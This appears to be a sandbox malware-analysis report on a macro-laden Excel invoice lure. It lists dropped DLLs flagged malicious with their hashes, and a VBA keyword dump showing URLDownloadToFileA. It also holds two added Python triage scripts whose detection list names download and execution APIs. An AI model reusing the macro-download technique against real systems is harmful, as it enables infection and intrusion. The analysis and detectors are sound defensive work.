                                                                                                SHA-256:068584F79F99C76B3B73E18EA25A5F0A0D4E56BE99D37D3A02361C9F5B2CBCAE
                                                                                                SHA-512:5F007A0157B586CDDC2D1E9812B280717702A51A0F68C63BEA826625A34E79FA7275301F3EF5203E3256AECDB91C56E146194554B931BA57BD58757526511AD1
                                                                                                Malicious:false
                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\Tar2A1.tmp
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):152533
                                                                                                Entropy (8bit):6.31602258454967
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                Malicious:false
                                                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628853255480928
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:LIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqmq:ERKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:B613AB3EEF642E50999219C6BC103C24
                                                                                                SHA1:D2DF29F7ACFC78B500217AF07BC69B558E08D12E
                                                                                                SHA-256:4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
                                                                                                SHA-512:DC8B8909964B85799DA724B38A1D6A8EC96B64B3A8BB359B1647AF6B009A363A7343DDA93C44AF362D3476939A731FE7A333E07CB329D41E4E4095CB8D0B3527
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                 C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1_Total New Invoices-Thursday January 21_2021.LNK
                                                                                                 Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                 File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:08 2021, length=51781, window=hide
                                                                                                 Category: dropped
                                                                                                 Size (bytes): 2388
                                                                                                 Entropy (8bit): 4.58939303919126
                                                                                                 Encrypted: false
                                                                                                 SSDEEP: 48:8E/XT0jFzSit6C7dqYitM+Qh2E/XT0jFzSit6C7dqYitM+Q/:8E/XojFzSetdFeM+Qh2E/XojFzSetdF3
                                                                                                 MD5: FEFCBF36C1DFE519C45CFEDA4FC5AC99
                                                                                                 SHA1: D238FB9334AC8B45E0EA60B70D7FA955F8E8621B
                                                                                                 SHA-256: 0AFB82F1D6FC4307FB3A61F4C04FD5601E393E317E3AFB6B7DF0E8375E6F47EC
                                                                                                 SHA-512: 6074C94D6DCC4B345FAE85F178370042DC068B7281274A94366BB41B6D12A092736969AC7B7F57B1DF2E15B3EB328938865FDC9BFB533EC0E18438625C91ABB7
                                                                                                 Malicious: false
                                                                                                Preview: L..................F.... .....l..{..p...Q.....:.Q...E............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2....6RT. .1_TOTA~1.XLS..........Q.y.Q.y*...8.....................1._.T.o.t.a.l. .N.e.w. .I.n.v.o.i.c.e.s.-.T.h.u.r.s.d.a.y. .J.a.n.u.a.r.y. .2.1._.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\1_Total New Invoices-Thursday January 21_2021.xlsm.I.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1._.T.o.t.a.l. .N.e.w. .I.n.v.o.i.c.e.s.-.T.h.u.r.s.d.a.y. .J.a.n.u.a.r.y. .2.1._.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.
                                                                                                 C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                 Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                 File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:04 2021, length=8192, window=hide
                                                                                                 Category: dropped
                                                                                                 Size (bytes): 867
                                                                                                 Entropy (8bit): 4.459646821678823
                                                                                                 Encrypted: false
                                                                                                 SSDEEP: 12:85Q7QXfVCLgXg/XAlCPCHaXtB8XzB/IGUX+Wnicvb7jLbDtZ3YilMMEpxRljK8Cs:85zU/XTd6jcYefbDv3q+rNru/
                                                                                                 MD5: AEE70929E31AB37A254C87326A7D0D3E
                                                                                                 SHA1: 41D2F56B766B0A2BAA1F561F20FE4494CD70C389
                                                                                                 SHA-256: E6B5213E4AF12E194107E0EFCA3863000D013FA579A65F119D22AE35E322A796
                                                                                                 SHA-512: D4C430AEA2E8C46AF9EBC2D08C9B2B025E693277EF2D3F397B0234FCD6942A8AF8416B0D0110CA0FB44819FD13CCE86A77B8FC88F4F5C11DDCA614FEAA201A06
                                                                                                 Malicious: false
                                                                                                Preview: L..................F...........7G..p...Q...p...Q.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....6Rc...Desktop.d......QK.X6Rc.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                 C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                 Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                 File Type: ASCII text, with CRLF line terminators
                                                                                                 Category: dropped
                                                                                                 Size (bytes): 190
                                                                                                 Entropy (8bit): 5.035278798464317
                                                                                                 Encrypted: false
                                                                                                 SSDEEP: 3:oyBVomxWSdFoHJUTRMFbsp6lhFoHJUTRMFbsp6lmxWSdFoHJUTRMFbsp6lv:djBFoHJqMDrFoHJqMDUFoHJqMD1
                                                                                                 MD5: A187ABF37658D31C9E15AC193D5FAF74
                                                                                                 SHA1: 8C6073CAD73B282337A4A21B4D44F253A32BD1A4
                                                                                                 SHA-256: 0C441D01B50C425D018E61E0DB13312E80330A56E3EB05B864C1515A775EF088
                                                                                                 SHA-512: 7113994CF9AF9316400829AD07DA6C25BDF915F8335942C15A09E77DC4737CE400D416B3084BC04D5DF080150FA5CB8663D14C4C3CC7350929BDBD6A0A4BD38E
                                                                                                 Malicious: false
                                                                                                Preview: Desktop.LNK=0..[misc]..1_Total New Invoices-Thursday January 21_2021.LNK=0..1_Total New Invoices-Thursday January 21_2021.LNK=0..[misc]..1_Total New Invoices-Thursday January 21_2021.LNK=0..
                                                                                                 C:\Users\user\Desktop\863F0000
                                                                                                 Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                 File Type: data
                                                                                                 Category: dropped
                                                                                                 Size (bytes): 51781
                                                                                                 Entropy (8bit): 7.800567178657162
                                                                                                 Encrypted: false
                                                                                                 SSDEEP: 768:X/Tu5G0cSBNdXT5H5W3FPbNmoWTXZJ8E5xc0/SWNFXqcjWC9:X/Tu5zcS1R0PmoWTXZJBzN/XNqcJ9
                                                                                                 MD5: 6C7B9B542ACB8B0B8AAFE9E97493588C
                                                                                                 SHA1: 9979EEB156ED95B8006470CABB2561A8DC9306A7
                                                                                                 SHA-256: ED7BE241973548AF186EA6D353EFE5A01C9F2631AF0BDB117C2259A282E70A4C
                                                                                                 SHA-512: 79FA3D7FC76D9F1A87D6C471FECAE7496BAF33BA09FC3D899BDBA55A5E2AAB8E7C383B6F1930EFADFE453FCDA7531F1C809B04126C987F44BDDA7B9867BE08B7
                                                                                                 Malicious: false
                                                                                                Preview: .VKo.0..W..@.V.M*UU.l.Mzl#%.z.....K.C...1l6..F........a}.*.4.0:'..$..)..r...K..$>0]0i4.d..\m.Y..-.......~.......q.4N..........^.V.(7:..i..d....=..8.;..M...{Q*'.Z)8.h.6.8.IMY.......3o.....A..:....B..<...VW'.BE.q~....D.i\..8...4...s.!......w.....2..q\3...9..{..Gc..T9Q@r.\...n!m%}4n.5f.M..j..r.Y...b....p...........i7\,.|F........L..#.B..gD./|..O>.."......NEG3..>.%.W..'.S.....`..^..K...E..{z......ft......0.#........Tb.A.!1Q..-.u.'.-!~..qcCDb..:X~6.ZOD........3Ty.......q..................PK..........!...U.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                 C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm
                                                                                                 Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                 File Type: data
                                                                                                 Category: dropped
                                                                                                 Size (bytes): 330
                                                                                                 Entropy (8bit): 1.4377382811115937
                                                                                                 Encrypted: false
                                                                                                 SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                 MD5: 96114D75E30EBD26B572C1FC83D1D02E
                                                                                                 SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                 SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                 SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                 Malicious: true
                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
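Added example, not taken from the report or the sample: the content-versus-name check behind a dropped-file listing like the one above. It classifies a blob from its leading bytes (PE via the e_lfanew pointer at offset 0x3C, ZIP/OOXML, OLE2 compound file, Shell Link header) and flags a file whose extension does not account for what it contains, such as a PE written to disk under a name with no executable extension. The EXPECTED mapping is an assumption, and every sample blob is constructed for the example.

```python
import os
import struct

# Documented magic values: ZIP local file header, OLE2 compound file header and
# the Shell Link header (HeaderSize 0x4C followed by LinkCLSID
# 00021401-0000-0000-C000-000000000046, the "L...F" seen in the LNK previews).
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
LNK_MAGIC = (b"L\x00\x00\x00"
             + b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")

# Assumed mapping: which sniffed content types each extension may legitimately carry.
EXPECTED = {
    ".exe": {"PE"}, ".dll": {"PE"}, ".ocx": {"PE"}, ".sys": {"PE"},
    ".xlsm": {"ZIP"}, ".xlsx": {"ZIP"}, ".docx": {"ZIP"}, ".docm": {"ZIP"}, ".zip": {"ZIP"},
    ".xls": {"OLE"}, ".doc": {"OLE"}, ".msi": {"OLE"},
    ".lnk": {"LNK"},
}


def sniff(data: bytes) -> str:
    """Classify a blob by its leading bytes: PE, MZ (DOS stub only), ZIP, OLE, LNK or DATA."""
    if data.startswith(b"MZ"):
        if len(data) >= 0x40:
            # e_lfanew at offset 0x3C is the file offset of the "PE\0\0" signature.
            (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "PE"
        return "MZ"  # DOS stub without a reachable PE header (truncated or plain DOS)
    if data.startswith(ZIP_MAGIC):
        return "ZIP"
    if data.startswith(OLE_MAGIC):
        return "OLE"
    if data.startswith(LNK_MAGIC):
        return "LNK"
    return "DATA"


def extension_mismatch(path: str, data: bytes) -> bool:
    """True when the content is a recognised executable or container that the
    extension does not account for. Unrecognised content is never flagged."""
    kind = sniff(data)
    if kind in ("DATA", "MZ"):
        return False
    ext = os.path.splitext(path)[1].lower()
    return kind not in EXPECTED.get(ext, set())


def fake_pe() -> bytes:
    """Constructed stand-in for a dropped PE: MZ stub, e_lfanew = 0x40, PE signature."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", stub, 0x3C, 0x40)
    return bytes(stub) + b"PE\x00\x00" + b"\x00" * 0x14


def fake_lnk() -> bytes:
    """Constructed stand-in for a .LNK: header followed by zeroed flags and attributes."""
    return LNK_MAGIC + b"\x00" * 0x38


if __name__ == "__main__":
    samples = [("dropped.bin", fake_pe()), ("Desktop.LNK", fake_lnk()),
               ("invoice.xlsm", ZIP_MAGIC + b"\x00" * 26), ("notes.txt", b"plain text")]
    for name, blob in samples:
        print(f"{name:14} {sniff(blob):5} mismatch={extension_mismatch(name, blob)}")
```

The classifier deliberately returns a separate MZ verdict for a DOS stub whose PE signature is not where e_lfanew points, so a truncated drop is reported rather than silently treated as a clean executable.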

                                                                                                Static File Info

                                                                                                General

                                                                                                 File type: Microsoft Excel 2007+
                                                                                                 Entropy (8bit): 7.638654402267145
                                                                                                 TrID:
                                                                                                 • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                 • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                 • ZIP compressed archive (8000/1) 7.58%
                                                                                                 File name: 1_Total New Invoices-Thursday January 21_2021.xlsm
                                                                                                 File size: 34299
                                                                                                 MD5: a52a88ae97dd408d38d98c9aa7f81142
                                                                                                 SHA1: 234b65bc42a077c98c61a8eb4870d41e0039013e
                                                                                                 SHA256: c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608
                                                                                                 SHA512: 5e613f1db0e10dbdb14bc3b0f8ef7816f27a5de9f8fbb63c698e18695d0f6c7872c1e958aa122342b0cdd8d0dea70f1b23dae85ef9ae6ef893b69d30d903feab
                                                                                                 SSDEEP: 384:h70vIUlM9z5B0QxAN57zJb3ke5QNt5Eil1LyGAEGibf8FMFHvVUkPnGq/g4jueSL:WQxENxzJb3e5bJ1bf8FmHvV3/Gq/g9ZL
                                                                                                File Content Preview:PK..........!...?.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                File Icon

                                                                                                 Icon Hash: e4e2aa8aa4bcbcac

                                                                                                Static OLE Info

                                                                                                General

                                                                                                 Document Type: OpenXML
                                                                                                 Number of OLE Files: 2

                                                                                                OLE File "/opt/package/joesandbox/database/analysis/342716/sample/1_Total New Invoices-Thursday January 21_2021.xlsm"

                                                                                                Indicators

                                                                                                 Has Summary Info: False
                                                                                                 Application Name: unknown
                                                                                                 Encrypted Document: False
                                                                                                 Contains Word Document Stream:
                                                                                                 Contains Workbook/Book Stream:
                                                                                                 Contains PowerPoint Document Stream:
                                                                                                 Contains Visio Document Stream:
                                                                                                 Contains ObjectPool Stream:
                                                                                                 Flash Objects Count:
                                                                                                 Contains VBA Macros: True

                                                                                                Summary

                                                                                                 Subject: by C.H. Robinson
                                                                                                 Author:
                                                                                                 Last Saved By:
                                                                                                 Create Time: 2021-01-21T13:13:53Z
                                                                                                 Last Saved Time: 2021-01-21T13:20:42Z
                                                                                                 Security: 0

                                                                                                Document Summary

                                                                                                 Thumbnail Scaling Desired: false
                                                                                                 Company:
                                                                                                 Contains Dirty Links: false
                                                                                                 Shared Document: false
                                                                                                 Changed Hyperlinks: false
                                                                                                 Application Version: 16.0300

                                                                                                Streams with VBA

                                                                                                VBA File Name: Module1.bas, Stream Size: 5129
                                                                                                General
                                                                                                 Stream Path: VBA/Module1
                                                                                                 VBA File Name: Module1.bas
                                                                                                 Stream Size: 5129
                                                                                                Data ASCII:. . . . . $ . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . 2 . . . . . . . . . . . . . . . . . . 4 . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . U R L D o w n l o a d T o F i l e A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 03 24 01 00 00 56 07 00 00 08 01 00 00 e4 01 00 00 ff ff ff ff 84 07 00 00 c8 0f 00 00 00 00 00 00 01 00 00 00 23 f3 ee 32 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 34 00 00 00 00 00 46 02 20 00 20 00 ff ff 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 00 00 ff ff ff ff 01 00 00 00 ff

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                #Else
                                                                                                (GAs_Y
                                                                                                n_page_A(s,
                                                                                                LongPtr
                                                                                                "urlmon"
                                                                                                Resume
                                                                                                Sheets(ol).Cells(timeAndDate,
                                                                                                Randomize:
                                                                                                fillename
                                                                                                Long,
                                                                                                "MegaA_"
                                                                                                PtrSafe
                                                                                                Declare
                                                                                                Next:
                                                                                                dwReserved
                                                                                                Rnd))
                                                                                                UBound(x_p_cl)
                                                                                                "sp")
                                                                                                String,
                                                                                                "sp":
                                                                                                pCaller
                                                                                                x_p_cl
                                                                                                String
                                                                                                Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants):
                                                                                                Split(govs,
                                                                                                "="):
                                                                                                SReport(timeAndDate)):
                                                                                                directoo
                                                                                                LongPtr,
                                                                                                x_p_cl(a):
                                                                                                Sheets(ol).Cells(aa,
                                                                                                timeAndDate
                                                                                                SReport
                                                                                                Integer:
                                                                                                ByVal
                                                                                                n_page_A
                                                                                                Integer)
                                                                                                Split(kij(ol),
                                                                                                Split(StrConv(m,
                                                                                                LBound(x_p_cl)
                                                                                                "URLDownloadToFileA"
                                                                                                ol).Name
                                                                                                Variant)
                                                                                                nimo(Int((UBound(nimo)
                                                                                                GAs_Y
                                                                                                Error
                                                                                                Attribute
                                                                                                ol).value
                                                                                                szURL
                                                                                                SReport(yel
                                                                                                help_with
                                                                                                help_with()
                                                                                                VB_Name
                                                                                                fillename,
                                                                                                Function
                                                                                                szFileName
                                                                                                lpfnCB
                                                                                                timeAndDate()
                                                                                                Alias
                                                                                                Print_Sheet_MAin()
                                                                                                GAs_Y()
                                                                                                SReport(Oa))),
                                                                                                Private
                                                                                                VBA Code
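Added example, not part of the report or the sample: a triage pass over an .xlsm that lists the code-bearing parts of the package, flags hidden and veryHidden sheets in xl/workbook.xml, and scans xl/vbaProject.bin for the Win32 download and execute names of the kind that appear in the Module1 keyword dump above (URLDownloadToFileA, "urlmon", Declare PtrSafe). The scan runs over raw bytes, where the module stream's p-code cache keeps identifiers in plain ASCII, as the Data Raw line above shows; it does not decompress the MS-OVBA source, so a project whose cache has been stripped or stomped still needs a full parser such as oletools' olevba. The SUSPICIOUS list is an assumption, the workbook is constructed in memory, and the stand-in for vbaProject.bin is the Module1 Data Raw excerpt from this page.

```python
import io
import re
import zipfile

# Win32 / scripting names that are seldom legitimate in a spreadsheet macro
# (assumed list; URLDownloadToFileA and urlmon come from the keyword dump above).
SUSPICIOUS = [
    "URLDownloadToFileA", "URLDownloadToFileW", "urlmon",
    "ShellExecuteA", "ShellExecuteW", "WinExec", "CreateProcessA",
    "WScript.Shell", "regsvr32", "rundll32",
]

# OOXML parts that can carry code: the VBA project, Excel 4.0 macro sheets, OLE embeddings.
CODE_PART = re.compile(r"^xl/(vbaProject\.bin|macrosheets/.*\.xml|embeddings/.*)$", re.I)
SHEET_TAG = re.compile(rb"<sheet\b[^>]*>")
SHEET_ATTR = re.compile(rb'\b(name|state)="([^"]*)"')

# Start of the Module1 stream as dumped in the report (Data Raw above); used as a
# stand-in for xl/vbaProject.bin so the example runs without the sample.
MODULE1_RAW = bytes.fromhex(
    "01 16 03 00 03 24 01 00 00 56 07 00 00 08 01 00 00 e4 01 00 00 ff ff ff ff "
    "84 07 00 00 c8 0f 00 00 00 00 00 00 01 00 00 00 23 f3 ee 32 00 00 ff ff 03 "
    "00 00 00 00 00 00 00 b6 00 ff ff 01 01 34 00 00 00 00 00 46 02 20 00 20 00 "
    "ff ff 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 "
    "52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 00 00 ff ff ff ff 01 00 "
    "00 00 ff"
)


def find_identifiers(blob: bytes) -> list:
    """Names from SUSPICIOUS present in blob as ASCII or UTF-16LE, in list order."""
    hits = []
    for name in SUSPICIOUS:
        if name.encode("ascii") in blob or name.encode("utf-16-le") in blob:
            hits.append(name)
    return hits


def triage_xlsm(data: bytes) -> dict:
    """Summarise the code-bearing parts of an OOXML workbook held in memory."""
    report = {"code_parts": [], "hidden_sheets": [], "api_hits": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        report["code_parts"] = sorted(n for n in names if CODE_PART.match(n))
        if "xl/workbook.xml" in names:
            for tag in SHEET_TAG.findall(z.read("xl/workbook.xml")):
                attrs = dict(SHEET_ATTR.findall(tag))
                # SpreadsheetML sheet visibility: visible (default), hidden, veryHidden.
                if attrs.get(b"state") in (b"hidden", b"veryHidden"):
                    report["hidden_sheets"].append(
                        (attrs.get(b"name", b"?").decode(), attrs[b"state"].decode()))
        if "xl/vbaProject.bin" in names:
            report["api_hits"] = find_identifiers(z.read("xl/vbaProject.bin"))
    return report


def build_sample() -> bytes:
    """Constructed workbook: a visible sheet, a veryHidden macro sheet and a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml",
                   '<workbook><sheets>'
                   '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
                   '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
                   '</sheets></workbook>')
        z.writestr("xl/macrosheets/sheet1.xml", "<xm:macrosheet/>")
        z.writestr("xl/vbaProject.bin", MODULE1_RAW)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_xlsm(build_sample()).items():
        print(f"{key}: {value}")
```

A veryHidden sheet cannot be unhidden from Excel's UI, and a macrosheets/ part is an Excel 4.0 macro sheet, so either finding on its own is worth a closer look before the workbook is opened anywhere macros can run.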
                                                                                                VBA File Name: Sheet1.cls, Stream Size: 1525
                                                                                                General
                                                                                                 Stream Path: VBA/Sheet1
                                                                                                 VBA File Name: Sheet1.cls
                                                                                                 Stream Size: 1525
